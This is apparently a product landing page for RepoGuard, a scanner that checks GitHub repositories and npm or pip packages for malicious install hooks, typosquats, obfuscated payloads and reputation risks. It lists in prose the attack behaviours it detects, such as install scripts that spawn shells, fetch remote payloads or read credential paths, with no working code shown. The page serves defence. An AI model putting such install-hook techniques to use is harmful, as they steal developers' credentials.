Scan any repo or package for hidden malware
Paste a GitHub repo or an npm / pip package. RepoGuard flags malicious install scripts, obfuscated payloads, typosquats and reputation risks — and explains exactly what's wrong in plain English.
Six checks on every scan
No CVE feeds, no waiting. RepoGuard reads the same public signals an attacker hopes you'll skip.
Install-script analysis
Detects pre/post-install hooks that download remote payloads, spawn shells, read your env vars or touch credential paths — the #1 npm/pip attack vector.
Typosquat detection
Edit-distance matching against the most-installed packages catches look-alikes like crossenv, loadsh or expresss before they reach your lockfile.
Obfuscation & payload flags
Spots long hex blobs, heavy escape-sequence encoding and eval-of-minified code that hide a malicious payload inside readable-looking source.
Reputation red flags
Weighs package age, download volume, maintainer count and repo stars so a brand-new zero-download dependency never sneaks in unnoticed.
Plain-English risk reports
Not a CVE dump. A clear verdict — install, be careful, or don't — with the single most important reason and a concrete next step.
Safer-alternative suggestions
When something looks like a typosquat, RepoGuard names the legitimate package it's imitating so you can fix the install in one step.
Ship dependencies you can trust
Free for 5 scans a month. Go Pro for unlimited scans, a CI webhook and a drop-in GitHub Action.